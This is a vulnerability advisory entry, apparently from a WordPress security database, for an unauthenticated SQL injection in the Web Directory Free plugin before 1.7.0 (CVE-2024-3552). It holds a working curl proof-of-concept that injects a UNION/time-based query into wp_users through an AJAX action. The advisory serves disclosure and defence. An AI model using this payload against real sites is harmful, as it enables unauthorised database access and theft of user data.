Lucene search
Simone Onofri, Kim Cerra, Andrea De DominicisWPEX-ID:34B03EE4-DE81-4FEC-9F3D-E1BD5B94D136HistoryMay 23, 2024 - 12:00 a.m.
Web Directory Free < 1.7.0 - Unauthenticated SQL Injection
2024-05-2300:00:00
Simone Onofri, Kim Cerra, Andrea De Dominicis
21
web directory free
unauthenticated
sql injection
poc
june 06 2024
update
0.001 Low
EPSS
Percentile
21.9%
Description The plugin does not sanitise and escape a parameter before using it in a SQL statement via an AJAX action available to unauthenticated users, leading to a SQL injection with different techniques like UNION, Time-Based and Error-Based.
curl --url 'http://vulnerable-site.tld/wp-admin/admin-ajax.php' --data 'action=w2dc_get_map_marker_info&locations_ids%5B%5D=1+UNION+SELECT+null%2C68%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Csleep(10)+FROM+wp_users&map_id=1&show_summary_button=1&show_readmore_button=1'Related
wpvulndb
wpvulndb
Web Directory Free < 1.7.0 - Unauthenticated SQL Injection
2024-05-23 00:00:00
cve
cve
CVE-2024-3552
2024-06-13 06:15:11
nuclei
nuclei
Web Directory Free < 1.7.0 - SQL Injection
2024-06-13 12:47:43
cvelist
cvelist
CVE-2024-3552 Web Directory Free < 1.7.0 - Unauthenticated SQL Injection
2024-06-13 06:00:02
vulnrichment
vulnrichment
CVE-2024-3552 Web Directory Free < 1.7.0 - Unauthenticated SQL Injection
2024-06-13 06:00:02
githubexploit
githubexploit
Exploit for CVE-2024-3552
2024-05-27 15:36:24
nvd
nvd
CVE-2024-3552
2024-06-13 06:15:11
wordfence
wordfence